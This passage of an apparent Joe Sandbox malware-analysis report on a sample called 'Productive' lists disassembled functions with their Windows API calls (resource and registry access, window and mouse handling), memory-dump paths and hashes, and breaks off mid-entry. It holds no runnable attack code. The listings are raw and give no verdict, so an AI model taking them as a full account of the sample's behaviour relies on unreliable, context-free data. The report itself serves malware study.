                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                • API String ID: 348263315-3771769585
                                                                                                                                                                • Opcode ID: 853a419e7093de0f0bfbff24d265dca1b6293d1b4295fb4ef39bbcb9cab93f25
                                                                                                                                                                • Instruction ID: 8e0a1dea9e5201af8a341048fcf2a1e09af485e6f01e496d2a1e0a49fe9513b0
                                                                                                                                                                • Opcode Fuzzy Hash: 853a419e7093de0f0bfbff24d265dca1b6293d1b4295fb4ef39bbcb9cab93f25
                                                                                                                                                                • Instruction Fuzzy Hash: 3C113A35614108BFCB1BBB60DD4AEDA77BCDF45710F004166F5089A291EF70ADC18EA0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00300817,?,?,00000000,00000000), ref: 00319EE8
                                                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00300817,?,?,00000000,00000000), ref: 00319EFF
                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00300817,?,?,00000000,00000000,?,?,?,?,?,?,002C4A14), ref: 00319F0F
                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00300817,?,?,00000000,00000000,?,?,?,?,?,?,002C4A14), ref: 00319F20
                                                                                                                                                                • LockResource.KERNEL32(00300817,?,?,00300817,?,?,00000000,00000000,?,?,?,?,?,?,002C4A14,00000000), ref: 00319F2F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                • String ID: SCRIPT
                                                                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                                                                • Opcode ID: 4feb81d394888ebb2bd76f4ee69b63bd5d29af69b4487904b072c7bf0622cb50
                                                                                                                                                                • Instruction ID: d8236575fb876f239f0eb7969166aaae8b4a46099a8a2f78019e605cedb91925
                                                                                                                                                                • Opcode Fuzzy Hash: 4feb81d394888ebb2bd76f4ee69b63bd5d29af69b4487904b072c7bf0622cb50
                                                                                                                                                                • Instruction Fuzzy Hash: 6E117074200700BFE72A8B65DC48F677BBDEBC9B11F10466DBA09DA290DB71EC45C660
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00314802
                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00314809
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0031481F
                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00314826
                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0031486A
                                                                                                                                                                Strings
                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00314847
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                • API String ID: 4072794657-3128320259
                                                                                                                                                                • Opcode ID: 3e588e917bf04723b0ac13f995c376902f73b1b26d66ed7a3e569e27e68eab66
                                                                                                                                                                • Instruction ID: 1ffadda29088934bd93ebe2263982df6ef8765b91f27ebe0fe39d5e929406086
                                                                                                                                                                • Opcode Fuzzy Hash: 3e588e917bf04723b0ac13f995c376902f73b1b26d66ed7a3e569e27e68eab66
                                                                                                                                                                • Instruction Fuzzy Hash: 640162FAA002087FE756D7A09D89EF6737CEB09301F400595BB4AE6041EB74AE844B75
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002D4282,?), ref: 002D41D3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 002D41DA
                                                                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 002D41E6
                                                                                                                                                                • DecodePointer.KERNEL32(00000001,002D4282,?), ref: 002D4203
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                • String ID: RoInitialize$combase.dll
                                                                                                                                                                • API String ID: 3489934621-340411864
                                                                                                                                                                • Opcode ID: 731c42cb908c0e09e6b0aea5cbb460cf52567026bda2951bfd7ddc0a5cda2489
                                                                                                                                                                • Instruction ID: 721f58fee0ce55cf962cf2931c9956fe9c5a55d83146eff7cd08ffe6b8074c42
                                                                                                                                                                • Opcode Fuzzy Hash: 731c42cb908c0e09e6b0aea5cbb460cf52567026bda2951bfd7ddc0a5cda2489
                                                                                                                                                                • Instruction Fuzzy Hash: DFE0ED78650701AFEE666F70DC4DB4839ACA712706F904424F605EA1E0CBF564848E00
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002D41A8), ref: 002D42A8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 002D42AF
                                                                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 002D42BA
                                                                                                                                                                • DecodePointer.KERNEL32(002D41A8), ref: 002D42D5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                                                                • API String ID: 3489934621-2819208100
                                                                                                                                                                • Opcode ID: 89120af8d0db9dc5ef946176aadf56d03e4d1c85a3c94deded60e5a2f8171b58
                                                                                                                                                                • Instruction ID: 3754b04f6cdfe16367f9541e638d6e0cb0a2931b7fcb1439f8a28dad69ea0027
                                                                                                                                                                • Opcode Fuzzy Hash: 89120af8d0db9dc5ef946176aadf56d03e4d1c85a3c94deded60e5a2f8171b58
                                                                                                                                                                • Instruction Fuzzy Hash: 68E0BF78A90701ABDF6B9F70AD0DB443AACB701703F900525F505DA1E0CBF46554CA10
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 002B21B8
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 002B21F9
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002B2221
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 002B2350
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 002B2369
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1296646539-0
                                                                                                                                                                • Opcode ID: af0920c000732a256f302a1b858055e947ed1576b460e944531c2a65dc1ebe88
                                                                                                                                                                • Instruction ID: e0a25c45fe745a588eafb5c140cad8ab7fd3dac3f646f843caa1fd2ffadc0592
                                                                                                                                                                • Opcode Fuzzy Hash: af0920c000732a256f302a1b858055e947ed1576b460e944531c2a65dc1ebe88
                                                                                                                                                                • Instruction Fuzzy Hash: 34B16939A2024ADBDF10CFA9C4807EEB7B1FF08350F148169ED59EB254DB74A964CB64
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0033147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0033040D,?,?), ref: 00331491
                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0033091D
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0033095D
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00330980
                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003309A9
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003309EC
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 003309F9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3451389628-0
                                                                                                                                                                • Opcode ID: 052be3b24b07260a4dbae2bcaceb4a9be48a60fd1bec97414f3295b6d68bd2ac
                                                                                                                                                                • Instruction ID: cc0e6b32ccba81d66572a944a07b7168b56197cf0b56fe1de4e2f01ca6ae83ea
                                                                                                                                                                • Opcode Fuzzy Hash: 052be3b24b07260a4dbae2bcaceb4a9be48a60fd1bec97414f3295b6d68bd2ac
                                                                                                                                                                • Instruction Fuzzy Hash: 71516A31218200AFD719EF64C896E6BBBE9FF85314F044A1DF5858B2A2DB31E915CB52
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002E1AF1: SetFilePointerEx.KERNEL32(00000000,00000002,?,00000000,?,00000000,00000000,00000000,00000000,?,002DDC81,?,00000000,00000000,00000002,00000000), ref: 002E1B28
                                                                                                                                                                  • Part of subcall function 002E1AF1: GetLastError.KERNEL32(?,002DDC81,?,00000000,00000000,00000002,00000000,00000000,00000000), ref: 002E1B32
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00340994,00000001,00000000,?,?,002E8479,00340994,0000000C,00000080), ref: 002E9A3B
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00340994,00000001,00000000,?,?,002E8479,00340994,0000000C,00000080), ref: 002E9A42
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00340994,?,?,?,?,?,?,?,?,00340994,00000001,00000000,?,?,002E8479), ref: 002E9AE4
                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00340994,00000001,00000000,?,?,002E8479,00340994), ref: 002E9AEB
                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00340994,00000001,00000000,?,?,002E8479), ref: 002E9B21
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00340994,00000001,00000000,?,?,002E8479,00340994), ref: 002E9B51
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1354853467-0
                                                                                                                                                                • Opcode ID: 971a08e194a5b7f0a7236c379d5bb34e6a7bd78e2f8bcb0a51333751ff2e7ace
                                                                                                                                                                • Instruction ID: 8efb106b80e448e3ff53f9533cb372fb38a27908b173b870cd28660e109fa1c0
                                                                                                                                                                • Opcode Fuzzy Hash: 971a08e194a5b7f0a7236c379d5bb34e6a7bd78e2f8bcb0a51333751ff2e7ace
                                                                                                                                                                • Instruction Fuzzy Hash: 68415932AA05556BDB145FBE8C4676E7AA8AF06320F940237F928D73D0DB744DB08B51
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenu.USER32(?), ref: 00335E38
                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00335E6F
                                                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00335E97
                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00335F06
                                                                                                                                                                • GetSubMenu.USER32(?,?), ref: 00335F14
                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00335F65
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 650687236-0
                                                                                                                                                                • Opcode ID: 6386dd1a3602fb0eabc97164ac1cc73798984fb3412543620a6e170082a7d3c9
                                                                                                                                                                • Instruction ID: 49b272c914c0f0a65b4fd1ac52520fa1ad53cb14906e30bd953ba576ea74c824
                                                                                                                                                                • Opcode Fuzzy Hash: 6386dd1a3602fb0eabc97164ac1cc73798984fb3412543620a6e170082a7d3c9
                                                                                                                                                                • Instruction Fuzzy Hash: AC51AC75A01615EFCB16EF64C885AEEB7B5EF48310F114099F915BB391CB34AE418F90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 002B1B76
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 002B1BDA
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002B1BF7
                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002B1C08
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 002B1C52
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1827037458-0
                                                                                                                                                                • Opcode ID: f0750b40d3e627ba5bed7426f3c5e2f82f3adbd8d8422dbf2042d861e41fedc2
                                                                                                                                                                • Instruction ID: e25be73e0f6a99f6d391a2277050c3083f8a484d7ed420a8cd9057e67873d33d
                                                                                                                                                                • Opcode Fuzzy Hash: f0750b40d3e627ba5bed7426f3c5e2f82f3adbd8d8422dbf2042d861e41fedc2
                                                                                                                                                                • Instruction Fuzzy Hash: 8741D434114301AFD722DF25CC99FB67BF8EB49364F14056DF9998B2A1C730A864DB62
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(003777B0,00000000,013AD7E0,?,?,003777B0,?,0033BC1A,?,?), ref: 0033BD84
                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 0033BDA8
                                                                                                                                                                • ShowWindow.USER32(003777B0,00000000,013AD7E0,?,?,003777B0,?,0033BC1A,?,?), ref: 0033BE08
                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,0033BC1A,?,?), ref: 0033BE1A
                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 0033BE3E
                                                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0033BE61
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                • Opcode ID: 4ea0af58e3b17d85ff5cb2019e3b3ed6bd27f63835f2c766dd96cff0eba71a72
                                                                                                                                                                • Instruction ID: 720147eca311526a8afd8ecbe989812cd3308170e259d9f685b91ab5530799fa
                                                                                                                                                                • Opcode Fuzzy Hash: 4ea0af58e3b17d85ff5cb2019e3b3ed6bd27f63835f2c766dd96cff0eba71a72
                                                                                                                                                                • Instruction Fuzzy Hash: B9415B35600144EFDB27CF28D4C9B94BBE1FF46314F1A41A9EB498F2A2CB31A845CB51
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00317698
                                                                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003176CF
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 003176EB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00317765
                                                                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0031777A
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00317799
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3368777196-0
                                                                                                                                                                • Opcode ID: 3d98ade3be9901d05815e7366e154b096f0eefc8acf638ab3d26c61f3c090794
                                                                                                                                                                • Instruction ID: f636519cdc82a8badfcf20c0c048dba975428994f4faa417a1eeb63104f88f1b
                                                                                                                                                                • Opcode Fuzzy Hash: 3d98ade3be9901d05815e7366e154b096f0eefc8acf638ab3d26c61f3c090794
                                                                                                                                                                • Instruction Fuzzy Hash: CB319435A14105EFDB15EF94DC85EAEB778EF45300F2480A6FD04AB296DB70AE64CB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,0032550C,?,?,00000000,00000001), ref: 00327796
                                                                                                                                                                  • Part of subcall function 0032406C: GetWindowRect.USER32(?,?), ref: 0032407F
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 003277C0
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 003277C7
                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003277F9
                                                                                                                                                                  • Part of subcall function 003157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315877
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00327825
                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00327883
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4137160315-0
                                                                                                                                                                • Opcode ID: 8d7b521937a83b5a2f3ccb07cf95a286879a32aa0d8df664dba4071367ca1427
                                                                                                                                                                • Instruction ID: ae02aad1664f440aa6f1976a175dd02aa055a551a4c6db40c40a7130978ceb1a
                                                                                                                                                                • Opcode Fuzzy Hash: 8d7b521937a83b5a2f3ccb07cf95a286879a32aa0d8df664dba4071367ca1427
                                                                                                                                                                • Instruction Fuzzy Hash: CC31D272608315ABD725DF14D84AF9BB7E9FF89314F000919F5959B181DB30E948CB92
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00308CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00308CDE
                                                                                                                                                                  • Part of subcall function 00308CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00308CE8
                                                                                                                                                                  • Part of subcall function 00308CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00308CF7
                                                                                                                                                                  • Part of subcall function 00308CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00308CFE
                                                                                                                                                                  • Part of subcall function 00308CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00308D14
                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,0030904D), ref: 00309482
